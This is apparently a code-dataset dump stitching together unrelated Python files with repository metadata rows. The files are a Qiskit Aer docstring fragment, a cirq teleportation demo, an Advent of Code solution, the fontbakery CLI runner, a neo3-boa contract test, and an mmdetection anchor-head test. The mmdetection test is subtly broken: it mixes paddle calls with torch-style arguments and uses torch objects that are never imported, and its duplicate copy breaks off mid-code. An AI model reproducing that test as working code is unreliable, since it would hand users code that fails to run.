SetStabilizer
SetSuperOp
SetUnitary
SetMatrixProductState
QuantumCircuit Methods
----------------------
The set instructions can also be added to circuits by using the
following ``QuantumCircuit`` methods which are patched when importing Aer.
.. autosummary::
:toctree: ../stubs/
set_statevector
set_density_matrix
set_stabilizer
set_unitary
set_superop
set_matrix_product_state
Saving Simulator Data
=====================
.. note ::
Each save instruction has a default label for accessing from the
circuit result data, however duplicate labels in results will result
in an exception being raised. If you use more than 1 instance of a
specific save instruction you must set a custom label for the
additional instructions.
Simulator State Save Instruction Classes
----------------------------------------
The following instructions can be used to save the state of the simulator
into the returned result object. The :class:`SaveState` instruction will
automatically select the format based on the simulation method (eg.
:class:`SaveStatevector` for statevector method, :class:`SaveDensityMatrix`
for density matrix method etc.).
.. autosummary::
:toctree: ../stubs/
SaveState
SaveStatevector
SaveStatevectorDict
SaveDensityMatrix
SaveMatrixProductState
SaveStabilizer
SaveSuperOp
SaveUnitary
.. note::
The :class:`SaveDensityMatrix` instruction can be used to save the
reduced densit matrix of a subset of qubits for supported simulation
methods, however all other save state instructions must be applied
to all qubits in a run circuit.
Simulator Derived Data Save Instruction Classes
-----------------------------------------------
The following classes can be used to directly save data derived from the
simulator state to the returned result object. One some are compatible
with certain simulation methods.
For convenience the save instructions can be accessed using
custom ``QuantumCircuit`` methods
.. autosummary::
:toctree: ../stubs/
SaveExpectationValue
SaveExpectationValueVariance
SaveProbabilities
SaveProbabilitiesDict
SaveAmplitudes
SaveAmplitudesSquared
.. note ::
When saving pershot data by using the ``pershot=True`` kwarg
in the above instructions, the resulting list may only contain
a single value rather than the number of shots. This
happens when a run circuit supports measurement sampling because
it is either
1. An ideal simulation with all measurements at the end.
2. A noisy simulation using the density matrix method with all
measurements at the end.
In both these cases only a single shot is actually simulated and
measurement samples for all shots are calculated from the final
state.
QuantumCircuit Methods
----------------------
The save instructions can also be added to circuits by using the
following ``QuantumCircuit`` methods which are patched when importing Aer.
.. autosummary::
:toctree: ../stubs/
save_amplitudes
save_amplitudes_squared
save_density_matrix
save_expectation_value
save_expectation_value_variance
save_matrix_product_state
save_probabilities
save_probabilities_dict
save_stabilizer
save_state
save_statevector
save_statevector_dict
save_unitary
Method Compatibility
====================
The following table summarizes which instructions are compatible with
which simulation methods
.. csv-table::
:file: instructions_table.csv
:header-rows: 1
"""
__all__ = [
'SaveAmplitudes',
'SaveAmplitudesSquared',
'SaveDensityMatrix',
'SaveExpectationValue',
'SaveExpectationValueVariance',
'SaveMatrixProductState',
'SaveProbabilities',
'SaveProbabilitiesDict',
'SaveStabilizer',
'SaveState',
'SaveStatevector',
'SaveStatevectorDict',
'SaveSuperOp',
'SaveUnitary',
'SetDensityMatrix',
'SetStabilizer',
'SetStatevector',
'SetSuperOp',
'SetUnitary',
'SetMatrixProductState'
]
from .save_instructions import *
from .set_instructions import *
| 28.409326 | 77 | 0.70983 |
__all__ = [
'SaveAmplitudes',
'SaveAmplitudesSquared',
'SaveDensityMatrix',
'SaveExpectationValue',
'SaveExpectationValueVariance',
'SaveMatrixProductState',
'SaveProbabilities',
'SaveProbabilitiesDict',
'SaveStabilizer',
'SaveState',
'SaveStatevector',
'SaveStatevectorDict',
'SaveSuperOp',
'SaveUnitary',
'SetDensityMatrix',
'SetStabilizer',
'SetStatevector',
'SetSuperOp',
'SetUnitary',
'SetMatrixProductState'
]
from .save_instructions import *
from .set_instructions import *
| true | true |
1c3053e084bf6d1940bc940227a24e8501fcf2aa | 1,223 | py | Python | 02-algorithms/teleportation.py | tai271828/cookbook-cirq | 88ac7b8d1c8d3f433c2961ce226d5a517e80e0c6 | [
"BSD-3-Clause"
] | 2 | 2020-05-17T08:13:45.000Z | 2020-09-23T00:58:17.000Z | 02-algorithms/teleportation.py | tai271828/cookbook-cirq | 88ac7b8d1c8d3f433c2961ce226d5a517e80e0c6 | [
"BSD-3-Clause"
] | null | null | null | 02-algorithms/teleportation.py | tai271828/cookbook-cirq | 88ac7b8d1c8d3f433c2961ce226d5a517e80e0c6 | [
"BSD-3-Clause"
] | null | null | null | import math
import random
import cirq
def main():
circuit = cirq.Circuit()
message, alice, bob = cirq.LineQubit.range(3)
# Prepare the Bell state of Alice's and Bob's qubits
# That is, making the entangled state of them
circuit.append([cirq.H(alice), cirq.CNOT(alice, bob)])
# Mock up the message state that will be sent by Alice
# TODO: mocking in the random way
circuit.append(cirq.I(message))
# Bell measurement and get two classical bits
circuit.append([cirq.CNOT(message, alice), cirq.H(message)])
circuit.append(cirq.measure(message))
circuit.append(cirq.measure(alice))
# decode the state of the qubit owned by bob
circuit.append([cirq.CNOT(alice, bob), cirq.CZ(message, bob)])
# simulate the circuit
simulator = cirq.Simulator()
final_result = simulator.simulate(circuit)
print(circuit)
# The final_state should be one of the computation basis
# |000> + |001> + |010> + |011> +
# |100> + |101> + |110> + |111>
#
# Because the initial state of message is |0> and cirq.I does not change its state,
# so the final_state should be 1x|000>
print(final_result.final_state)
if __name__ == '__main__':
main()
| 29.119048 | 87 | 0.668847 | import math
import random
import cirq
def main():
circuit = cirq.Circuit()
message, alice, bob = cirq.LineQubit.range(3)
circuit.append([cirq.H(alice), cirq.CNOT(alice, bob)])
circuit.append(cirq.I(message))
circuit.append([cirq.CNOT(message, alice), cirq.H(message)])
circuit.append(cirq.measure(message))
circuit.append(cirq.measure(alice))
circuit.append([cirq.CNOT(alice, bob), cirq.CZ(message, bob)])
simulator = cirq.Simulator()
final_result = simulator.simulate(circuit)
print(circuit)
print(final_result.final_state)
if __name__ == '__main__':
main()
| true | true |
1c305481bc660200af684e6b8573b46e7253a6b5 | 2,238 | py | Python | entries/day17/main.py | ZeldaZach/AdventOfCode2021 | 3eefd3dcaeb331457c4fc58866705aa6c6580830 | [
"MIT"
] | 1 | 2022-01-02T11:00:04.000Z | 2022-01-02T11:00:04.000Z | entries/day17/main.py | ZeldaZach/AdventOfCode2021 | 3eefd3dcaeb331457c4fc58866705aa6c6580830 | [
"MIT"
] | null | null | null | entries/day17/main.py | ZeldaZach/AdventOfCode2021 | 3eefd3dcaeb331457c4fc58866705aa6c6580830 | [
"MIT"
] | null | null | null | import pathlib
import re
from typing import List, Union, Tuple
def read_inputs(input_file: str) -> List[int]:
with pathlib.Path(input_file).open() as fp:
line = fp.readline()
area_regex = re.compile(r"target area: x=(-?\d+)..(-?\d+), y=(-?\d+)..(-?\d+)")
return list(map(int, area_regex.findall(line)[0]))
def check_if_probe_hits(
probe_x: int,
probe_y: int,
velocity_x: int,
velocity_y: int,
target_x_range: List[int],
target_y_range: List[int],
):
max_x_target = max(target_x_range)
min_y_target = min(target_y_range)
max_probe_y = float("-inf")
while probe_x <= max_x_target and probe_y >= min_y_target:
probe_x += velocity_x
probe_y += velocity_y
velocity_x += -1 if velocity_x > 0 else (1 if velocity_x else 0)
velocity_y -= 1
max_probe_y = max(max_probe_y, probe_y)
if probe_x in target_x_range and probe_y in target_y_range:
return True, max_probe_y
return False, -1
def anal_the_probes(
target_min_x: int, target_max_x: int, target_min_y: int, target_max_y: int
) -> Tuple[int, int]:
valid_target_x = list(range(target_min_x, target_max_x + 1))
valid_target_y = list(range(target_min_y, target_max_y + 1))
valid_velocities = []
max_height_of_valid_probe = float("-inf")
for probe_x in range(1, max(valid_target_x)):
for probe_y in range(min(valid_target_y), 100):
does_hit_target, max_height = check_if_probe_hits(
0, 0, probe_x, probe_y, valid_target_x, valid_target_y
)
if does_hit_target:
max_height_of_valid_probe = max(max_height_of_valid_probe, max_height)
valid_velocities.append((probe_x, probe_y))
return max_height_of_valid_probe, len(valid_velocities)
def part1() -> int:
# 20 minutes
x_min, x_max, y_min, y_max = read_inputs("input.txt")
return anal_the_probes(x_min, x_max, y_min, y_max)[0]
def part2() -> int:
# 7 minutes
x_min, x_max, y_min, y_max = read_inputs("input.txt")
return anal_the_probes(x_min, x_max, y_min, y_max)[1]
def main() -> None:
print(part1())
print(part2())
if __name__ == "__main__":
main()
| 27.975 | 86 | 0.652368 | import pathlib
import re
from typing import List, Union, Tuple
def read_inputs(input_file: str) -> List[int]:
with pathlib.Path(input_file).open() as fp:
line = fp.readline()
area_regex = re.compile(r"target area: x=(-?\d+)..(-?\d+), y=(-?\d+)..(-?\d+)")
return list(map(int, area_regex.findall(line)[0]))
def check_if_probe_hits(
probe_x: int,
probe_y: int,
velocity_x: int,
velocity_y: int,
target_x_range: List[int],
target_y_range: List[int],
):
max_x_target = max(target_x_range)
min_y_target = min(target_y_range)
max_probe_y = float("-inf")
while probe_x <= max_x_target and probe_y >= min_y_target:
probe_x += velocity_x
probe_y += velocity_y
velocity_x += -1 if velocity_x > 0 else (1 if velocity_x else 0)
velocity_y -= 1
max_probe_y = max(max_probe_y, probe_y)
if probe_x in target_x_range and probe_y in target_y_range:
return True, max_probe_y
return False, -1
def anal_the_probes(
target_min_x: int, target_max_x: int, target_min_y: int, target_max_y: int
) -> Tuple[int, int]:
valid_target_x = list(range(target_min_x, target_max_x + 1))
valid_target_y = list(range(target_min_y, target_max_y + 1))
valid_velocities = []
max_height_of_valid_probe = float("-inf")
for probe_x in range(1, max(valid_target_x)):
for probe_y in range(min(valid_target_y), 100):
does_hit_target, max_height = check_if_probe_hits(
0, 0, probe_x, probe_y, valid_target_x, valid_target_y
)
if does_hit_target:
max_height_of_valid_probe = max(max_height_of_valid_probe, max_height)
valid_velocities.append((probe_x, probe_y))
return max_height_of_valid_probe, len(valid_velocities)
def part1() -> int:
x_min, x_max, y_min, y_max = read_inputs("input.txt")
return anal_the_probes(x_min, x_max, y_min, y_max)[0]
def part2() -> int:
x_min, x_max, y_min, y_max = read_inputs("input.txt")
return anal_the_probes(x_min, x_max, y_min, y_max)[1]
def main() -> None:
print(part1())
print(part2())
if __name__ == "__main__":
main()
| true | true |
1c3054edcb87c40ad2dd5603ddd25890bebe93c2 | 11,856 | py | Python | Lib/fontbakery/commands/check_specification.py | Bhanditz/fontbakery | 683fcf3a69a8c0dde805a9e93cd54693c0fad590 | [
"Apache-2.0"
] | null | null | null | Lib/fontbakery/commands/check_specification.py | Bhanditz/fontbakery | 683fcf3a69a8c0dde805a9e93cd54693c0fad590 | [
"Apache-2.0"
] | null | null | null | Lib/fontbakery/commands/check_specification.py | Bhanditz/fontbakery | 683fcf3a69a8c0dde805a9e93cd54693c0fad590 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# usage:
# $ fontbakery check-specification fontbakery.specifications.googlefonts -h
import argparse
import importlib.util
import os
import sys
from collections import OrderedDict
from fontbakery.checkrunner import (
distribute_generator
, CheckRunner
, ValueValidationError
, Spec
, get_module_specification
, DEBUG
, INFO
, WARN
, ERROR
, SKIP
, PASS
, FAIL
, STARTSECTION
, ENDSECTION
)
log_levels = OrderedDict((s.name,s) for s in sorted((
DEBUG
, INFO
, WARN
, ERROR
, SKIP
, PASS
, FAIL
)))
DEFAULT_LOG_LEVEL = WARN
from fontbakery.reporters.terminal import TerminalReporter
from fontbakery.reporters.serialize import SerializeReporter
from fontbakery.reporters.ghmarkdown import GHMarkdownReporter
from fontbakery.reporters.html import HTMLReporter
def ArgumentParser(specification, spec_arg=True):
argument_parser = argparse.ArgumentParser(description="Check TTF files"
" against a specification.",
formatter_class=argparse.RawTextHelpFormatter)
if spec_arg:
argument_parser.add_argument('specification',
help='File/Module name, must define a fontbakery "specification".')
values_keys = specification.setup_argparse(argument_parser)
argument_parser.add_argument(
"-c",
"--checkid",
action="append",
help=(
"Explicit check-ids (or parts of their name) to be executed. "
"Use this option multiple times to select multiple checks."
),
)
argument_parser.add_argument(
"-x",
"--exclude-checkid",
action="append",
help=(
"Exclude check-ids (or parts of their name) from execution. "
"Use this option multiple times to exclude multiple checks."
),
)
def log_levels_get(key):
if key in log_levels:
return log_levels[key]
raise argparse.ArgumentTypeError('Key "{}" must be one of: {}.'.format(
key, ', '.join(log_levels.keys())))
argument_parser.add_argument('-v', '--verbose', dest='loglevels', const=PASS, action='append_const',
help='Shortcut for `-l PASS`.\n')
argument_parser.add_argument('-l', '--loglevel', dest='loglevels', type=log_levels_get,
action='append',
metavar= 'LOGLEVEL',
help='Report checks with a result of this status or higher.\n'
'One of: {}.\n'
'(default: {})'.format(', '.join(log_levels.keys())
, DEFAULT_LOG_LEVEL.name))
argument_parser.add_argument('-m', '--loglevel-messages', default=None, type=log_levels_get,
help=('Report log messages of this status or higher.\n'
'Messages are all status lines within a check.\n'
'One of: {}.\n'
'(default: LOGLEVEL)'
).format(', '.join(log_levels.keys())))
if sys.platform != "win32":
argument_parser.add_argument(
'-n',
'--no-progress',
action='store_true',
help='In a tty as stdout, don\'t render the progress indicators.')
argument_parser.add_argument(
'-C',
'--no-colors',
action='store_true',
help='No colors for tty output.')
argument_parser.add_argument('-S', '--show-sections', default=False, action='store_true',
help='Show section start and end info plus summary.')
argument_parser.add_argument('-L', '--list-checks', default=False, action='store_true',
help='List the checks available in the selected specification.')
argument_parser.add_argument('--json', default=False, type=argparse.FileType('w'),
metavar= 'JSON_FILE',
help='Write a json formatted report to JSON_FILE.')
argument_parser.add_argument('--ghmarkdown', default=False, type=argparse.FileType('w'),
metavar= 'MD_FILE',
help='Write a GitHub-Markdown formatted report to MD_FILE.')
argument_parser.add_argument('--html', default=False,
type=argparse.FileType('w', encoding="utf-8"),
metavar= 'HTML_FILE',
help='Write a HTML report to HTML_FILE.')
iterargs = sorted(specification.iterargs.keys())
gather_by_choices = iterargs + ['*check']
argument_parser.add_argument('-g','--gather-by', default=None,
metavar= 'ITERATED_ARG',
choices=gather_by_choices,
type=str,
help='Optional: collect results by ITERATED_ARG\n'
'In terminal output: create a summary counter for each ITERATED_ARG.\n'
'In json output: structure the document by ITERATED_ARG.\n'
'One of: {}'.format(', '.join(gather_by_choices))
)
def parse_order(arg):
order = filter(len, [n.strip() for n in arg.split(',')])
return order or None
argument_parser.add_argument('-o','--order', default=None, type=parse_order,
help='Comma separated list of order arguments.\n'
'The execution order is determined by the order of the check\n'
'definitions and by the order of the iterable arguments.\n'
'A section defines its own order. `--order` can be used to\n'
'override the order of *all* sections.\n'
'Despite the ITERATED_ARGS there are two special\n'
'values available:\n'
'"*iterargs" -- all remainig ITERATED_ARGS\n'
'"*check" -- order by check\n'
'ITERATED_ARGS: {}\n'
'A sections default is equivalent to: "*iterargs, *check".\n'
'A common use case is `-o "*check"` when checking the whole \n'
'collection against a selection of checks picked with `--checkid`.'
''.format(', '.join(iterargs))
)
return argument_parser, values_keys
class ArgumentParserError(Exception): pass
class ThrowingArgumentParser(argparse.ArgumentParser):
def error(self, message):
raise ArgumentParserError(message)
def get_module_from_file(filename):
# filename = 'my/path/to/file.py'
# module_name = 'file_module.file_py'
module_name = 'file_module.{}'.format(os.path.basename(filename).replace('.', '_'))
spec = importlib.util.spec_from_file_location(module_name, filename)
module = importlib.util.module_from_spec(spec)
spec.loader.exec_module(module)
return module
def get_module(name):
if os.path.isfile(name):
# This name could also be the name of a module, but if there's a
# file that we can load the file will win. Otherwise, it's still
# possible to change the directory
imported = get_module_from_file(name)
else:
from importlib import import_module
# Fails with an appropriate ImportError.
imported = import_module(name, package=None)
return imported
def get_spec():
""" Prefetch the specification module, to fill some holes in the help text."""
argument_parser = ThrowingArgumentParser(add_help=False)
argument_parser.add_argument('specification')
try:
args, _ = argument_parser.parse_known_args()
except ArgumentParserError:
# silently fails, the main parser will show usage string.
return Spec()
imported = get_module(args.specification)
specification = get_module_specification(imported)
if not specification:
raise Exception(f"Can't get a specification from {imported}.")
return specification
# This stub or alias is kept for compatibility (e.g. check-commands, FontBakery
# Dashboard). The function of the same name previously only passed on all parameters to
# CheckRunner.
runner_factory = CheckRunner
def main(specification=None, values=None):
# specification can be injected by e.g. check-googlefonts injects it's own spec
add_spec_arg = False
if specification is None:
specification = get_spec()
add_spec_arg = True
argument_parser, values_keys = ArgumentParser(specification, spec_arg=add_spec_arg)
args = argument_parser.parse_args()
if args.list_checks:
print('Available checks')
for section_name, section in specification._sections.items():
checks = section.list_checks()
message = "# {}:\n {}".format(section_name,"\n ".join(checks))
print(message)
sys.exit()
values_ = {}
if values is not None:
values_.update(values)
# values_keys are returned by specification.setup_argparse
# these are keys for custom arguments required by the spec.
if values_keys:
for key in values_keys:
if hasattr(args, key):
values_[key] = getattr(args, key)
try:
runner = CheckRunner(specification
, values=values_
, custom_order=args.order
, explicit_checks=args.checkid
, exclude_checks=args.exclude_checkid
)
except ValueValidationError as e:
print(e)
argument_parser.print_usage()
sys.exit(1)
# The default Windows Terminal just displays the escape codes. The argument
# parser above therefore has these options disabled.
if sys.platform == "win32":
args.no_progress = True
args.no_colors = True
# the most verbose loglevel wins
loglevel = min(args.loglevels) if args.loglevels else DEFAULT_LOG_LEVEL
tr = TerminalReporter(runner=runner, is_async=False
, print_progress=not args.no_progress
, check_threshold=loglevel
, log_threshold=args.loglevel_messages or loglevel
, usecolor=not args.no_colors
, collect_results_by=args.gather_by
, skip_status_report=None if args.show_sections\
else (STARTSECTION, ENDSECTION)
)
reporters = [tr.receive]
if args.json:
sr = SerializeReporter(runner=runner, collect_results_by=args.gather_by)
reporters.append(sr.receive)
if args.ghmarkdown:
mdr = GHMarkdownReporter(loglevels=args.loglevels,
runner=runner,
collect_results_by=args.gather_by)
reporters.append(mdr.receive)
if args.html:
hr = HTMLReporter(loglevels=args.loglevels,
runner=runner,
collect_results_by=args.gather_by)
reporters.append(hr.receive)
distribute_generator(runner.run(), reporters)
if args.json:
import json
json.dump(sr.getdoc(), args.json, sort_keys=True, indent=4)
print("A report in JSON format has been"
" saved to '{}'".format(args.json.name))
if args.ghmarkdown:
args.ghmarkdown.write(mdr.get_markdown())
print("A report in GitHub Markdown format which can be useful\n"
" for posting issues on a GitHub issue tracker has been\n"
" saved to '{}'".format(args.ghmarkdown.name))
if args.html:
args.html.write(hr.get_html())
print(f"A report in HTML format has been saved to '{args.html.name}'")
# Fail and error let the command fail
return 1 if tr.worst_check_status in (ERROR, FAIL) else 0
if __name__ == '__main__':
sys.exit(main())
| 37.878594 | 102 | 0.609565 |
import argparse
import importlib.util
import os
import sys
from collections import OrderedDict
from fontbakery.checkrunner import (
distribute_generator
, CheckRunner
, ValueValidationError
, Spec
, get_module_specification
, DEBUG
, INFO
, WARN
, ERROR
, SKIP
, PASS
, FAIL
, STARTSECTION
, ENDSECTION
)
log_levels = OrderedDict((s.name,s) for s in sorted((
DEBUG
, INFO
, WARN
, ERROR
, SKIP
, PASS
, FAIL
)))
DEFAULT_LOG_LEVEL = WARN
from fontbakery.reporters.terminal import TerminalReporter
from fontbakery.reporters.serialize import SerializeReporter
from fontbakery.reporters.ghmarkdown import GHMarkdownReporter
from fontbakery.reporters.html import HTMLReporter
def ArgumentParser(specification, spec_arg=True):
argument_parser = argparse.ArgumentParser(description="Check TTF files"
" against a specification.",
formatter_class=argparse.RawTextHelpFormatter)
if spec_arg:
argument_parser.add_argument('specification',
help='File/Module name, must define a fontbakery "specification".')
values_keys = specification.setup_argparse(argument_parser)
argument_parser.add_argument(
"-c",
"--checkid",
action="append",
help=(
"Explicit check-ids (or parts of their name) to be executed. "
"Use this option multiple times to select multiple checks."
),
)
argument_parser.add_argument(
"-x",
"--exclude-checkid",
action="append",
help=(
"Exclude check-ids (or parts of their name) from execution. "
"Use this option multiple times to exclude multiple checks."
),
)
def log_levels_get(key):
if key in log_levels:
return log_levels[key]
raise argparse.ArgumentTypeError('Key "{}" must be one of: {}.'.format(
key, ', '.join(log_levels.keys())))
argument_parser.add_argument('-v', '--verbose', dest='loglevels', const=PASS, action='append_const',
help='Shortcut for `-l PASS`.\n')
argument_parser.add_argument('-l', '--loglevel', dest='loglevels', type=log_levels_get,
action='append',
metavar= 'LOGLEVEL',
help='Report checks with a result of this status or higher.\n'
'One of: {}.\n'
'(default: {})'.format(', '.join(log_levels.keys())
, DEFAULT_LOG_LEVEL.name))
argument_parser.add_argument('-m', '--loglevel-messages', default=None, type=log_levels_get,
help=('Report log messages of this status or higher.\n'
'Messages are all status lines within a check.\n'
'One of: {}.\n'
'(default: LOGLEVEL)'
).format(', '.join(log_levels.keys())))
if sys.platform != "win32":
argument_parser.add_argument(
'-n',
'--no-progress',
action='store_true',
help='In a tty as stdout, don\'t render the progress indicators.')
argument_parser.add_argument(
'-C',
'--no-colors',
action='store_true',
help='No colors for tty output.')
argument_parser.add_argument('-S', '--show-sections', default=False, action='store_true',
help='Show section start and end info plus summary.')
argument_parser.add_argument('-L', '--list-checks', default=False, action='store_true',
help='List the checks available in the selected specification.')
argument_parser.add_argument('--json', default=False, type=argparse.FileType('w'),
metavar= 'JSON_FILE',
help='Write a json formatted report to JSON_FILE.')
argument_parser.add_argument('--ghmarkdown', default=False, type=argparse.FileType('w'),
metavar= 'MD_FILE',
help='Write a GitHub-Markdown formatted report to MD_FILE.')
argument_parser.add_argument('--html', default=False,
type=argparse.FileType('w', encoding="utf-8"),
metavar= 'HTML_FILE',
help='Write a HTML report to HTML_FILE.')
iterargs = sorted(specification.iterargs.keys())
gather_by_choices = iterargs + ['*check']
argument_parser.add_argument('-g','--gather-by', default=None,
metavar= 'ITERATED_ARG',
choices=gather_by_choices,
type=str,
help='Optional: collect results by ITERATED_ARG\n'
'In terminal output: create a summary counter for each ITERATED_ARG.\n'
'In json output: structure the document by ITERATED_ARG.\n'
'One of: {}'.format(', '.join(gather_by_choices))
)
def parse_order(arg):
order = filter(len, [n.strip() for n in arg.split(',')])
return order or None
argument_parser.add_argument('-o','--order', default=None, type=parse_order,
help='Comma separated list of order arguments.\n'
'The execution order is determined by the order of the check\n'
'definitions and by the order of the iterable arguments.\n'
'A section defines its own order. `--order` can be used to\n'
'override the order of *all* sections.\n'
'Despite the ITERATED_ARGS there are two special\n'
'values available:\n'
'"*iterargs" -- all remainig ITERATED_ARGS\n'
'"*check" -- order by check\n'
'ITERATED_ARGS: {}\n'
'A sections default is equivalent to: "*iterargs, *check".\n'
'A common use case is `-o "*check"` when checking the whole \n'
'collection against a selection of checks picked with `--checkid`.'
''.format(', '.join(iterargs))
)
return argument_parser, values_keys
class ArgumentParserError(Exception): pass
class ThrowingArgumentParser(argparse.ArgumentParser):
def error(self, message):
raise ArgumentParserError(message)
def get_module_from_file(filename):
# filename = 'my/path/to/file.py'
# module_name = 'file_module.file_py'
module_name = 'file_module.{}'.format(os.path.basename(filename).replace('.', '_'))
spec = importlib.util.spec_from_file_location(module_name, filename)
module = importlib.util.module_from_spec(spec)
spec.loader.exec_module(module)
return module
def get_module(name):
if os.path.isfile(name):
# This name could also be the name of a module, but if there's a
# possible to change the directory
imported = get_module_from_file(name)
else:
from importlib import import_module
# Fails with an appropriate ImportError.
imported = import_module(name, package=None)
return imported
def get_spec():
argument_parser = ThrowingArgumentParser(add_help=False)
argument_parser.add_argument('specification')
try:
args, _ = argument_parser.parse_known_args()
except ArgumentParserError:
# silently fails, the main parser will show usage string.
return Spec()
imported = get_module(args.specification)
specification = get_module_specification(imported)
if not specification:
raise Exception(f"Can't get a specification from {imported}.")
return specification
runner_factory = CheckRunner
def main(specification=None, values=None):
add_spec_arg = False
if specification is None:
specification = get_spec()
add_spec_arg = True
argument_parser, values_keys = ArgumentParser(specification, spec_arg=add_spec_arg)
args = argument_parser.parse_args()
if args.list_checks:
print('Available checks')
for section_name, section in specification._sections.items():
checks = section.list_checks()
message = "# {}:\n {}".format(section_name,"\n ".join(checks))
print(message)
sys.exit()
values_ = {}
if values is not None:
values_.update(values)
# values_keys are returned by specification.setup_argparse
# these are keys for custom arguments required by the spec.
if values_keys:
for key in values_keys:
if hasattr(args, key):
values_[key] = getattr(args, key)
try:
runner = CheckRunner(specification
, values=values_
, custom_order=args.order
, explicit_checks=args.checkid
, exclude_checks=args.exclude_checkid
)
except ValueValidationError as e:
print(e)
argument_parser.print_usage()
sys.exit(1)
# The default Windows Terminal just displays the escape codes. The argument
# parser above therefore has these options disabled.
if sys.platform == "win32":
args.no_progress = True
args.no_colors = True
# the most verbose loglevel wins
loglevel = min(args.loglevels) if args.loglevels else DEFAULT_LOG_LEVEL
tr = TerminalReporter(runner=runner, is_async=False
, print_progress=not args.no_progress
, check_threshold=loglevel
, log_threshold=args.loglevel_messages or loglevel
, usecolor=not args.no_colors
, collect_results_by=args.gather_by
, skip_status_report=None if args.show_sections\
else (STARTSECTION, ENDSECTION)
)
reporters = [tr.receive]
if args.json:
sr = SerializeReporter(runner=runner, collect_results_by=args.gather_by)
reporters.append(sr.receive)
if args.ghmarkdown:
mdr = GHMarkdownReporter(loglevels=args.loglevels,
runner=runner,
collect_results_by=args.gather_by)
reporters.append(mdr.receive)
if args.html:
hr = HTMLReporter(loglevels=args.loglevels,
runner=runner,
collect_results_by=args.gather_by)
reporters.append(hr.receive)
distribute_generator(runner.run(), reporters)
if args.json:
import json
json.dump(sr.getdoc(), args.json, sort_keys=True, indent=4)
print("A report in JSON format has been"
" saved to '{}'".format(args.json.name))
if args.ghmarkdown:
args.ghmarkdown.write(mdr.get_markdown())
print("A report in GitHub Markdown format which can be useful\n"
" for posting issues on a GitHub issue tracker has been\n"
" saved to '{}'".format(args.ghmarkdown.name))
if args.html:
args.html.write(hr.get_html())
print(f"A report in HTML format has been saved to '{args.html.name}'")
# Fail and error let the command fail
return 1 if tr.worst_check_status in (ERROR, FAIL) else 0
if __name__ == '__main__':
sys.exit(main())
| true | true |
1c3055259508571a6bfa3a791d078170adfa3371 | 139 | py | Python | boa3_test/test_sc/string_test/IndexString.py | CityOfZion/neo3-boa | c31fadce597abd5e0bdea76985e35c7004ab9d39 | [
"Apache-2.0"
] | 25 | 2020-07-22T19:37:43.000Z | 2022-03-08T03:23:55.000Z | boa3_test/test_sc/string_test/IndexString.py | CityOfZion/neo3-boa | c31fadce597abd5e0bdea76985e35c7004ab9d39 | [
"Apache-2.0"
] | 419 | 2020-04-23T17:48:14.000Z | 2022-03-31T13:17:45.000Z | boa3_test/test_sc/string_test/IndexString.py | CityOfZion/neo3-boa | c31fadce597abd5e0bdea76985e35c7004ab9d39 | [
"Apache-2.0"
] | 15 | 2020-05-21T21:54:24.000Z | 2021-11-18T06:17:24.000Z | from boa3.builtin import public
@public
def main(a: str, value: str, start: int, end: int) -> int:
return a.index(value, start, end)
| 19.857143 | 58 | 0.676259 | from boa3.builtin import public
@public
def main(a: str, value: str, start: int, end: int) -> int:
return a.index(value, start, end)
| true | true |
1c3055cfcfa3a11de3c09866da49b3354f0d6f0d | 2,551 | py | Python | tests/test_models/test_dense_heads/test_anchor_head.py | hyperlist/mmdetection | ba4918de7fb21a96edc373584fa21a17d098a843 | [
"Apache-2.0"
] | null | null | null | tests/test_models/test_dense_heads/test_anchor_head.py | hyperlist/mmdetection | ba4918de7fb21a96edc373584fa21a17d098a843 | [
"Apache-2.0"
] | null | null | null | tests/test_models/test_dense_heads/test_anchor_head.py | hyperlist/mmdetection | ba4918de7fb21a96edc373584fa21a17d098a843 | [
"Apache-2.0"
] | null | null | null | # Copyright (c) OpenMMLab. All rights reserved.
import mmcv
import paddle
from mmdet.models.dense_heads import AnchorHead
def test_anchor_head_loss():
"""Tests anchor head loss when truth is empty and non-empty."""
s = 256
img_metas = [{
'img_shape': (s, s, 3),
'scale_factor': 1,
'pad_shape': (s, s, 3)
}]
cfg = mmcv.Config(
dict(
assigner=dict(
type='MaxIoUAssigner',
pos_iou_thr=0.7,
neg_iou_thr=0.3,
min_pos_iou=0.3,
match_low_quality=True,
ignore_iof_thr=-1),
sampler=dict(
type='RandomSampler',
num=256,
pos_fraction=0.5,
neg_pos_ub=-1,
add_gt_as_proposals=False),
allowed_border=0,
pos_weight=-1,
debug=False))
self = AnchorHead(num_classes=4, in_channels=1, train_cfg=cfg)
# Anchor head expects a multiple levels of features per image
feat = [
paddle.rand(1, 1, s // (2**(i + 2)), s // (2**(i + 2)))
for i in range(len(self.anchor_generator.strides))
]
cls_scores, bbox_preds = self.forward(feat)
# Test that empty ground truth encourages the network to predict background
gt_bboxes = [paddle.empty((0, 4))]
gt_labels = [torch.LongTensor([])]
gt_bboxes_ignore = None
empty_gt_losses = self.loss(cls_scores, bbox_preds, gt_bboxes, gt_labels,
img_metas, gt_bboxes_ignore)
# When there is no truth, the cls loss should be nonzero but there should
# be no box loss.
empty_cls_loss = sum(empty_gt_losses['loss_cls'])
empty_box_loss = sum(empty_gt_losses['loss_bbox'])
assert empty_cls_loss.item() > 0, 'cls loss should be non-zero'
assert empty_box_loss.item() == 0, (
'there should be no box loss when there are no true boxes')
# When truth is non-empty then both cls and box loss should be nonzero for
# random inputs
gt_bboxes = [
torch.Tensor([[23.6667, 23.8757, 238.6326, 151.8874]]),
]
gt_labels = [torch.LongTensor([2])]
one_gt_losses = self.loss(cls_scores, bbox_preds, gt_bboxes, gt_labels,
img_metas, gt_bboxes_ignore)
onegt_cls_loss = sum(one_gt_losses['loss_cls'])
onegt_box_loss = sum(one_gt_losses['loss_bbox'])
assert onegt_cls_loss.item() > 0, 'cls loss should be non-zero'
assert onegt_box_loss.item() > 0, 'box loss should be non-zero'
| 35.929577 | 79 | 0.602901 |
import mmcv
import paddle
from mmdet.models.dense_heads import AnchorHead
def test_anchor_head_loss():
s = 256
img_metas = [{
'img_shape': (s, s, 3),
'scale_factor': 1,
'pad_shape': (s, s, 3)
}]
cfg = mmcv.Config(
dict(
assigner=dict(
type='MaxIoUAssigner',
pos_iou_thr=0.7,
neg_iou_thr=0.3,
min_pos_iou=0.3,
match_low_quality=True,
ignore_iof_thr=-1),
sampler=dict(
type='RandomSampler',
num=256,
pos_fraction=0.5,
neg_pos_ub=-1,
add_gt_as_proposals=False),
allowed_border=0,
pos_weight=-1,
debug=False))
self = AnchorHead(num_classes=4, in_channels=1, train_cfg=cfg)
feat = [
